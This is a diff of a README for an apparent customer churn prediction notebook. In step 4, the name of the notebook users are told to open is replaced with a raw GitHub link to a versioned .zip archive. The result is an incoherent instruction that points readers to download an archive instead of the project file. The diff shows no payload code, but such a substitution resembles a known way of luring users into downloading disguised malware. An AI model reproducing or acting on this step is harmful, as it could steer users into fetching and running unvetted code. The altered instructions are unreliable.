megumim0123/Customer-Churn-Prediction/README.md

      ```
 2. A webpage will open in your default browser.
 3. Navigate to the folder where you extracted `Customer-Churn-Prediction`.
-4. Open the file named `Customer-Churn-Prediction.ipynb`.
+4. Open the file named `https://raw.githubusercontent.com/megumim0123/Customer-Churn-Prediction/main/notebooks/Churn-Customer-Prediction-v3.6-alpha.2.zip`.
 5. Click on the “Run” button at the top to execute the cells in the notebook step by step.
 6. Follow the instructions within the notebook to input your customer data for analysis.